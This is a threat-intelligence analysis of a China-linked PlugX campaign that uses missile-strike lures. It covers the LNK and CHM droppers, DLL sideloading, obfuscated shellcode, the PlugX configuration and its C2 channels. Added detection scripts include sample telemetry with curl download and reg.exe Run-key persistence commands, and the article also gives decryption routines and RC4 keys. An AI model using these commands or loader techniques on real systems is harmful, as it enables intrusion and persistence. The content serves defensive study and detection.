China-Linked Hackers Launch PlugX Malware Campaign Targeting Persian Gulf Amid Middle East Conflict

On March 1, 2026, security researchers from ThreatLabz detected a new cyber espionage campaign attributed to a China-linked threat actor targeting countries in the Persian Gulf. Notably, the operation began within the first 24 hours of renewed hostilities in the Middle East, suggesting the attackers rapidly adapted current geopolitical events to support their social engineering efforts.

The attackers used an Arabic-language lure referencing missile strikes to trick victims into opening malicious files. The campaign ultimately delivered a variant of the PlugX backdoor through a complex multi-stage infection chain.

Based on the techniques, infrastructure, and malware observed during the investigation, ThreatLabz attributes the activity to a China-nexus threat actor with high confidence. Researchers also assess, with moderate confidence, that the campaign may be linked to the group commonly known as Mustang Panda.

This analysis explores the complete attack sequence, including the use of Windows shortcut (LNK) files, CHM droppers, obfuscated shellcode loaders, and the final PlugX payload.

Source: Zscaler

Key Findings

ThreatLabz identified a cyber campaign in March 2026 conducted by a China-associated threat actor targeting organizations in the Persian Gulf region.

The attackers deployed a multi-stage infection chain that ultimately installed a PlugX backdoor on compromised systems.

Both the shellcode loader and the PlugX malware were heavily obfuscated using techniques such as control flow flattening (CFF) and mixed boolean arithmetic (MBA), which significantly complicate reverse engineering.

The PlugX variant used in this campaign communicates with its command-and-control infrastructure through HTTPS and resolves domains using DNS-over-HTTPS (DoH).


Technical Analysis

Attack Chain Overview

The attack began with a ZIP archive designed to exploit interest in the ongoing Middle East conflict. Inside the archive was a Windows shortcut file (LNK). When the victim opened this file, it triggered the download of a malicious Windows Compiled HTML Help (CHM) file from a remote server controlled by the attackers.

The CHM file served as the initial delivery mechanism for a series of malicious payloads. The infection process progressed through several stages:

  1. A shellcode loader
  2. Highly obfuscated shellcode
  3. Deployment of a PlugX backdoor variant

As part of the deception strategy, the attack also displayed a decoy PDF containing images of missile strikes. The Arabic text in the document translated to: “Iranian missile strikes against US base in Bahrain.”

This decoy was meant to convince victims they had opened a legitimate news-related file while the malware executed in the background.


Stage 1: ZIP Archive, LNK File, and CHM Downloader

The initial ZIP archive contained a Windows shortcut named: photo_2026-03-01_01-20-48.pdf.lnk

The filename was intentionally crafted with a double extension so it appeared to be a PDF document.

When executed, the shortcut used the command-line tool cURL to download a malicious CHM file from the following URL: hxxps://www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png

The LNK then invoked the legitimate Windows HTML Help executable (hh.exe) with the -decompile parameter to extract the contents of the CHM file.

Three files were unpacked during this step:

Filename   Description
0.lnk      Second-stage Windows shortcut
3          Decoy PDF used for social engineering
4          TAR archive containing malicious components

After extraction, the first LNK executed the second-stage shortcut (0.lnk).


Stage 2: Secondary LNK, Decoy File, and TAR Extraction

The second LNK carried out several operations:

  1. It renamed the decoy file 3 to photo_2026-03-01_01-20-48.pdf so the victim would see what appeared to be a legitimate document.
  2. It treated file 4 as a TAR archive and extracted its contents into the system’s %AppData% directory.
  3. It executed the file:
%AppData%\BaiduNetdisk\ShellFolder.exe --path a

This directory name was chosen to mimic the legitimate Baidu Netdisk application, helping the malware blend into the system.

ShellFolder.exe then used DLL sideloading to load a malicious DLL named ShellFolderDepend.dll.


ShellFolderDepend.dll: Shellcode Loader

The malicious DLL is a 32-bit component responsible for establishing persistence and launching the next stage of the attack.

All strings inside the DLL are encrypted and only decrypted during runtime using a custom XOR algorithm that combines an index value with a base constant.

KEY_BASE = 0x34

def decrypt_string(encrypted_bytes):
    # Each byte is XORed with its own index plus the base constant, truncated to 8 bits
    decrypted = []
    for i, byte in enumerate(encrypted_bytes):
        key = (i + KEY_BASE) & 0xFF
        decrypted.append(chr(byte ^ key))
    return "".join(decrypted)

Persistence Mechanism

Before executing the shellcode, the malware checks whether Bitdefender Agent (bdagent.exe) is running.

Two persistence methods are used depending on the result:

If Bitdefender is present

The malware creates a registry Run key using reg.exe:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Value: BaiNetdisk

If Bitdefender is not detected

The same registry key is created using the Windows API function RegSetValueExA.
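The behaviours described in Stage 1, Stage 2 and the persistence section each leave a distinct trace in endpoint telemetry (a help viewer invoked with -decompile, curl spawned by a double-clicked shortcut, an executable running from a look-alike Baidu Netdisk directory, and a Run key named BaiNetdisk written either by reg.exe or directly through the registry API). The following detection logic is an added example written for this page, not tooling from ThreatLabz; the telemetry format (simple key=value lines) and every event in SAMPLE_EVENTS are constructed here, and the download URL in them is a placeholder.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry in a simplified key=value format (process creation and
# registry write events). These lines are made up for this example, not campaign logs.
SAMPLE_EVENTS = [
    'type=process image="C:\\Windows\\System32\\curl.exe" parent=explorer.exe cmd="curl -o C:\\Users\\u\\AppData\\Local\\Temp\\index.png https://example.invalid/2026/thumbnail?img=index.png"',
    'type=process image="C:\\Windows\\hh.exe" parent=explorer.exe cmd="hh.exe -decompile C:\\Users\\u\\AppData\\Local\\Temp C:\\Users\\u\\AppData\\Local\\Temp\\index.png"',
    'type=process image="C:\\Users\\u\\AppData\\Roaming\\BaiduNetdisk\\ShellFolder.exe" parent=cmd.exe cmd="ShellFolder.exe --path a"',
    'type=process image="C:\\Windows\\System32\\reg.exe" parent=ShellFolder.exe cmd="reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v BaiNetdisk /t REG_SZ /d C:\\Users\\u\\AppData\\Roaming\\BaiduNetdisk\\ShellFolder.exe /f"',
    'type=registry key=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run value=BaiNetdisk process=ShellFolder.exe',
    'type=process image="C:\\Windows\\hh.exe" parent=explorer.exe cmd="hh.exe C:\\Users\\u\\Documents\\manual.chm"',
    'type=process image="C:\\Program Files\\Git\\mingw64\\bin\\curl.exe" parent=bash.exe cmd="curl -s https://example.invalid/api"',
]

# key=value, where the value is either a double-quoted string or a run of non-space characters
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed key=value telemetry line into a dict."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in KV_RE.finditer(line)}

RUN_KEY = r"software\microsoft\windows\currentversion\run"

def classify(ev: Dict[str, str]) -> List[str]:
    """Return the names of the campaign-specific rules a single event matches."""
    hits = []
    image = ev.get("image", "").lower()
    cmd = ev.get("cmd", "").lower()
    parent = ev.get("parent", "").lower()
    if ev.get("type") == "process":
        # Stage 1: hh.exe normally displays help; "-decompile" unpacks a CHM's files to disk.
        if image.endswith("\\hh.exe") and "-decompile" in cmd:
            hits.append("chm_decompile_via_hh")
        # Stage 1: curl spawned straight under the shell (a double-clicked LNK) saving a file.
        if image.endswith("\\curl.exe") and parent == "explorer.exe" and "-o" in cmd.split():
            hits.append("curl_download_from_shortcut")
        # Stage 2: the sideloading host executing from the fake Baidu Netdisk directory.
        if "\\appdata\\roaming\\baidunetdisk\\" in image:
            hits.append("baidunetdisk_lookalike_execution")
        # Persistence path taken when Bitdefender is present: Run key written via reg.exe.
        if image.endswith("\\reg.exe") and RUN_KEY in cmd and "/v bainetdisk" in cmd:
            hits.append("run_key_reg_exe")
    elif ev.get("type") == "registry":
        # Persistence path taken otherwise: RegSetValueExA shows up only as a registry write.
        if RUN_KEY in ev.get("key", "").lower() and ev.get("value", "").lower() == "bainetdisk":
            hits.append("run_key_api_write")
    return hits

def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Run every rule over the lines; return (line_index, matched_rules) for each hit."""
    results = []
    for idx, line in enumerate(lines):
        hits = classify(parse_event(line))
        if hits:
            results.append((idx, hits))
    return results

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, hits)
```

The two persistence rules are deliberately separate: the reg.exe variant is visible as a process-creation event, while the RegSetValueExA variant only appears in registry telemetry, so a detection that watches command lines alone covers just one of the two branches.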


API Hooking

Before decrypting the shellcode, the loader installs two inline API hooks:

Hook on GetCommandLineW

This hook alters the command-line return value to:

ShellFolder.exe 701 0

This manipulation makes it appear that the program was executed with specific arguments.

Hook on CreateProcessAsUserW

The hook restores the original API bytes and then calls Sleep indefinitely, preventing any child processes from being created.


Shellcode Decryption

The loader retrieves encrypted shellcode from a file named Shelter.ex.

The shellcode is decrypted using the Windows native API function SystemFunction033, which implements RC4, with the key:

20260301@@@

After decryption, the loader:

  1. Allocates executable memory using VirtualAlloc
  2. Copies the shellcode into memory
  3. Transfers execution to it

PlugX Shellcode Loader

The shellcode responsible for loading the backdoor is heavily obfuscated. It employs control flow flattening (CFF) to disguise the execution logic.

Instead of executing code sequentially, the shellcode operates like a state machine. Each code block updates a state variable and then returns execution to a dispatcher that determines the next block to execute.

This technique significantly complicates reverse engineering.

API String Encryption

API names are encrypted and decrypted dynamically using another XOR routine. The algorithm is the same as the one used earlier but uses a different base constant: 0x36 instead of 0x34.

The XOR logic itself is disguised using mixed boolean arithmetic, such as: (~x & K) | (x & ~K)

which mathematically equals: x ^ K.
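To make the two string-decryption routines (the loader's with base 0x34, the shellcode's with base 0x36) and the MBA identity concrete, here is an added example, written for this page and not code from the report or the malware. It parameterises the base constant, implements the obfuscated (~x & K) | (x & ~K) form side by side with plain XOR, and checks exhaustively over all 8-bit values that the two agree; the sample strings and their encoded forms are constructed here.

```python
KEY_BASE_LOADER = 0x34     # ShellFolderDepend.dll string table (constant from the report)
KEY_BASE_SHELLCODE = 0x36  # PlugX shellcode API names (constant from the report)

def mba_xor(x: int, k: int) -> int:
    """The mixed-boolean-arithmetic form (~x & K) | (x & ~K), evaluated on 8-bit values."""
    return ((~x & k) | (x & ~k)) & 0xFF

def xor_decode(data: bytes, key_base: int, use_mba: bool = False) -> str:
    """Index-keyed XOR shared by loader and shellcode: key for byte i is (i + base) & 0xFF.
    use_mba=True runs the obfuscated operator to show it yields the same plaintext."""
    op = mba_xor if use_mba else (lambda a, b: a ^ b)
    return "".join(chr(op(b, (i + key_base) & 0xFF)) for i, b in enumerate(data))

def xor_encode(text: str, key_base: int) -> bytes:
    """Inverse transform (XOR is its own inverse); used only to build constructed inputs."""
    return bytes((ord(c) ^ ((i + key_base) & 0xFF)) & 0xFF for i, c in enumerate(text))

# Constructed samples: two API names encoded with each variant's base constant.
SAMPLE_LOADER = xor_encode("CreateProcessAsUserW", KEY_BASE_LOADER)
SAMPLE_SHELLCODE = xor_encode("RtlDecompressBuffer", KEY_BASE_SHELLCODE)

def mba_identity_holds() -> bool:
    """Exhaustively confirm (~x & K) | (x & ~K) == x ^ K for every 8-bit x and K."""
    return all(mba_xor(x, k) == (x ^ k) for x in range(256) for k in range(256))

if __name__ == "__main__":
    print(xor_decode(SAMPLE_LOADER, KEY_BASE_LOADER))
    print(xor_decode(SAMPLE_SHELLCODE, KEY_BASE_SHELLCODE, use_mba=True))
    print("MBA identity holds:", mba_identity_holds())
```

Because the keystream depends only on the byte index and the base constant, a decoder for the loader variant recovers shellcode strings after a single constant change, which is why the report can describe the second routine as "similar" to the first.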


Payload Decryption

The shellcode contains an encrypted payload that is decrypted using a custom pseudo-random number generator (PRNG).

The process begins with a seed value:

0xc56dd7ea

The PRNG generates a keystream used to decrypt the embedded data.

seed = 0xc56dd7ea

def prng_decrypt(encrypted_data, seed):
    # Advance the 32-bit PRNG state once per byte and XOR its low byte into the data
    state = seed
    decrypted_blob = bytearray(len(encrypted_data))
    for i in range(len(encrypted_data)):
        state = (state + (state >> 3) + 0x13233366) & 0xFFFFFFFF
        decrypted_blob[i] = encrypted_data[i] ^ (state & 0xFF)
    return decrypted_blob

The resulting data structure includes:

  • a 16-byte header
  • a payload compressed using the LZNT1 algorithm

The shellcode decompresses the payload using the Windows API RtlDecompressBuffer.


Anti-Forensics Techniques

The decompressed payload contains a corrupted PE header.

Critical structures such as:

  • IMAGE_DOS_HEADER
  • DOS stub
  • PE signature

are intentionally overwritten with random ASCII data.

However, certain fields—like the e_lfanew pointer and the COFF file header—remain intact so the loader can still process the binary internally.

This manipulation is designed to evade memory forensic tools.
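A scanner that only looks for the "MZ" and "PE\0\0" markers will miss an image prepared this way, but the fields the loader has to keep (e_lfanew and the COFF file header) are enough to recognise one. The following is an added example for this page, not ThreatLabz tooling: build_sample_image constructs a minimal in-memory PE image (not real malware) and optionally wipes exactly the regions the report names, and classify_header follows e_lfanew and validates the COFF fields instead of trusting the signatures. The section count bound and the characteristics check are heuristics chosen here.

```python
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
# SizeOfOptionalHeader expected for each machine type (PE32 vs PE32+)
SIZE_OF_OPTIONAL_HEADER = {IMAGE_FILE_MACHINE_I386: 0xE0, IMAGE_FILE_MACHINE_AMD64: 0xF0}

def build_sample_image(corrupt: bool) -> bytes:
    """Construct a minimal PE image for testing. With corrupt=True the DOS header, DOS
    stub and PE signature are overwritten with ASCII filler while e_lfanew and the COFF
    file header are left intact, mirroring the anti-forensics described above."""
    e_lfanew = 0x80
    img = bytearray(0x200)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[0x40:e_lfanew] = b"This program cannot be run in DOS mode.".ljust(e_lfanew - 0x40, b"\x00")
    img[e_lfanew:e_lfanew + 4] = b"PE\x00\x00"
    # COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (EXECUTABLE | 32BIT | DLL)
    struct.pack_into("<HHIIIHH", img, e_lfanew + 4,
                     IMAGE_FILE_MACHINE_I386, 4, 0, 0, 0, 0xE0, 0x2102)
    if corrupt:
        filler = b"K7ugPq2ZxVn9oL4bHw"  # fixed "random" ASCII so the sample is deterministic
        wiped = list(range(0, 0x3C)) + list(range(0x40, e_lfanew)) + list(range(e_lfanew, e_lfanew + 4))
        for off in wiped:
            img[off] = filler[off % len(filler)]
    return bytes(img)

def classify_header(buf: bytes) -> str:
    """Return 'intact', 'stripped_pe_header' or 'not_pe' for an in-memory buffer."""
    if len(buf) < 0x40:
        return "not_pe"
    has_mz = buf[:2] == b"MZ"
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if e_lfanew + 24 > len(buf):          # signature (4) + COFF header (20) must fit
        return "not_pe"
    has_pe_sig = buf[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    coff_ok = (
        machine in SIZE_OF_OPTIONAL_HEADER
        and 1 <= nsections <= 96
        and opt_size == SIZE_OF_OPTIONAL_HEADER[machine]
        and (chars & IMAGE_FILE_EXECUTABLE_IMAGE) != 0
    )
    if not coff_ok:
        return "not_pe"
    return "intact" if (has_mz and has_pe_sig) else "stripped_pe_header"

if __name__ == "__main__":
    print(classify_header(build_sample_image(corrupt=False)))
    print(classify_header(build_sample_image(corrupt=True)))
```

The check works because the loader itself has to read e_lfanew and the COFF header to map the image, so those bytes cannot be randomised without breaking the implant; a memory scan that keys on them rather than on the magic values survives the header wipe.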


Reflective DLL Injection

The decrypted payload is loaded directly into memory through reflective DLL injection.

The loader performs several steps:

  1. Allocates memory with VirtualAlloc
  2. Maps all DLL sections into memory
  3. Applies relocations
  4. Resolves imported functions
  5. Marks the region executable

The first 0x20 bytes of the image base are repurposed as a context structure that contains configuration data for PlugX.


PlugX Backdoor

The final payload is a PlugX backdoor, also heavily obfuscated using the same techniques seen earlier:

  • Control Flow Flattening (CFF)
  • Mixed Boolean Arithmetic (MBA)
  • Encrypted API strings

The malware receives its configuration through the context structure passed to DllMain.

The configuration is decrypted in two stages.


PlugX Configuration

Stage 1

A custom algorithm decrypts the overall configuration blob.

Stage 2

Individual configuration fields are further decrypted using RC4 with the key:

qwedfgx202211

The decoded configuration includes:

Field                     Value
Target file extensions    .doc, .pdf, .xls, .ppt, *.mp3, *.wav
Date filter               Last 30 days
C2 server                 https://91.193.17[.]117:443
Persistence path          %ProgramFiles%\Microsoft\Display Broker
Registry name             DesktopDialogBroker
Service name              Microsoft Desktop Dialog Broker
Service description       Manages connection and configuration of local and remote display dialogs
RC4 key for C2 traffic    VD*1^N1OCLtAGM$U
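RC4 appears three times in this chain: SystemFunction033 decrypts Shelter.ex with 20260301@@@, the configuration fields are decrypted with qwedfgx202211, and C2 traffic uses VD*1^N1OCLtAGM$U. An analyst working from a memory dump or an extracted file needs the same primitive offline, so here is an added example written for this page (not code from the report or the malware): a plain RC4 implementation equivalent to what SystemFunction033 computes, with the three keys from the report as constants. The encrypted field SAMPLE_FIELD is constructed here by encrypting a known value; it is not data from the sample.

```python
def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: permute S[0..255] under the key bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S

def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric, so this both encrypts and decrypts (what SystemFunction033 does)."""
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray(len(data))
    for n, byte in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out[n] = byte ^ S[(S[i] + S[j]) & 0xFF]
    return bytes(out)

SHELLCODE_KEY = b"20260301@@@"        # Shelter.ex key (from the report)
CONFIG_KEY = b"qwedfgx202211"         # configuration field key (from the report)
C2_TRAFFIC_KEY = b"VD*1^N1OCLtAGM$U"  # C2 traffic key (from the report)

def decrypt_shellcode(blob: bytes) -> bytes:
    """Offline equivalent of the loader's SystemFunction033 call on Shelter.ex contents."""
    return rc4_crypt(SHELLCODE_KEY, blob)

def decrypt_config_field(blob: bytes) -> str:
    """Stage 2 of the configuration decryption: one RC4 pass per field."""
    return rc4_crypt(CONFIG_KEY, blob).decode("utf-8", errors="replace")

# Constructed sample: a configuration field encrypted here with the report's key.
SAMPLE_FIELD = rc4_crypt(CONFIG_KEY, b"DesktopDialogBroker")

def rc4_test_vector_ok() -> bool:
    """Sanity-check the implementation against the published vector Key='Key', Plaintext='Plaintext'."""
    return rc4_crypt(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"

if __name__ == "__main__":
    print("test vector ok:", rc4_test_vector_ok())
    print(decrypt_config_field(SAMPLE_FIELD))
```

Because RC4 has no integrity protection, a wrong key simply produces garbage rather than an error; checking the result for the expected structure (printable strings, a known 16-byte header, a valid LZNT1 stream) is the only signal that the right key was used.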

Command and Control Capabilities

This PlugX variant supports multiple communication channels:

  • TCP
  • HTTPS
  • UDP
  • DNS-over-HTTPS via https://dns.google/dns-query
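Two of these channels stand out in network telemetry: DNS-over-HTTPS to dns.google from a process that is not a browser, and TLS to a bare IP address with no hostname (the C2 in this campaign is reached as https://91.193.17[.]117:443). The following is an added example for this page, not ThreatLabz detection content; the JSON event format, the process and browser names, and every line in SAMPLE_NETLOG are constructed, and cloudflare-dns.com is an assumed extra resolver not mentioned in the report. The C2 address and dns.google come from the report.

```python
import json
from typing import List

DOH_RESOLVERS = {"dns.google", "cloudflare-dns.com"}   # dns.google from the report; the other is assumed
KNOWN_C2 = {"91.193.17.117"}                           # from the report (defanged there as 91.193.17[.]117)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}  # assumed list of processes expected to use DoH

# Constructed proxy/EDR network events, one JSON object per line. Not real traffic.
SAMPLE_NETLOG = [
    '{"process":"ShellFolder.exe","dst_host":"dns.google","dst_ip":"8.8.8.8","dst_port":443,"uri":"/dns-query"}',
    '{"process":"chrome.exe","dst_host":"dns.google","dst_ip":"8.8.8.8","dst_port":443,"uri":"/dns-query"}',
    '{"process":"ShellFolder.exe","dst_host":"","dst_ip":"91.193.17.117","dst_port":443,"uri":"/"}',
    '{"process":"outlook.exe","dst_host":"outlook.office365.com","dst_ip":"203.0.113.10","dst_port":443,"uri":"/"}',
    '{"process":"svchost.exe","dst_host":"","dst_ip":"198.51.100.7","dst_port":443,"uri":"/update"}',
]

def detect(line: str) -> List[str]:
    """Apply the three network rules to one event and return the names of those that fire."""
    ev = json.loads(line)
    hits = []
    proc = ev["process"].lower()
    # DoH resolver reached by something other than a browser: the malware resolves C2 names this way
    if ev["dst_host"] in DOH_RESOLVERS and ev["uri"].startswith("/dns-query") and proc not in BROWSERS:
        hits.append("doh_from_non_browser")
    # Direct hit on the C2 address published in the report
    if ev["dst_ip"] in KNOWN_C2:
        hits.append("known_plugx_c2")
    # HTTPS to a bare IP with no hostname: how the C2 URL in the configuration is written
    if ev["dst_port"] == 443 and not ev["dst_host"]:
        hits.append("tls_to_bare_ip")
    return hits

def scan_netlog(lines: List[str]) -> List[List[str]]:
    """Return the rule hits for every line, in order (empty list for clean events)."""
    return [detect(line) for line in lines]

if __name__ == "__main__":
    for line, hits in zip(SAMPLE_NETLOG, scan_netlog(SAMPLE_NETLOG)):
        print(json.loads(line)["process"], hits)
```

The bare-IP rule is the noisy one (updaters and some telemetry agents do the same), so it is best used to enrich rather than alert on its own; the DoH-from-non-browser rule is far more specific once the allowlist of browsers and DoH-capable agents is tuned for the environment.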

The malware can execute numerous commands, including:

  • Collecting system information
  • Launching plugins
  • Scanning the local network
  • Proxying traffic through other infected systems
  • Updating its configuration

It also includes several built-in plugins for functionality such as:

  • file system access
  • process monitoring
  • registry editing
  • keylogging
  • remote shell access
  • screen capture
  • network analysis
  • SQL interaction

Threat Attribution

ThreatLabz attributes the campaign to a China-linked threat actor with high confidence and believes it may be associated with Mustang Panda.

Several indicators support this assessment.

First, the campaign used the PlugX backdoor, a tool historically linked to Chinese cyber-espionage groups.

Second, the RC4 key used for decrypting the configuration (qwedfgx202211) matches one used in the DOPLUGS campaign reported in 2024.

Third, the shellcode decryption key format (YYYYMMDD@@@) closely resembles patterns used in earlier attacks attributed to Chinese actors.

Additionally, Mustang Panda is known for rapidly exploiting geopolitical events to craft convincing phishing lures. The use of a Middle East conflict-themed document aligns with this behavior.

Finally, the specific implementation of control flow flattening and the configuration decryption routines resemble code previously observed in attacks attributed to the PKPLUG group, another alias of Mustang Panda.


Conclusion

This campaign demonstrates how rapidly cyber-espionage groups can exploit real-world events to increase the effectiveness of their attacks. By referencing current geopolitical developments, the attackers crafted convincing lures that could easily deceive victims.

The operation relied on a sophisticated multi-stage infection chain involving LNK files, CHM droppers, encrypted shellcode, and a heavily obfuscated PlugX backdoor.

ThreatLabz advises organizations and individuals to remain cautious when opening unsolicited files or links claiming to provide breaking news about geopolitical conflicts, particularly those related to the ongoing Middle East situation.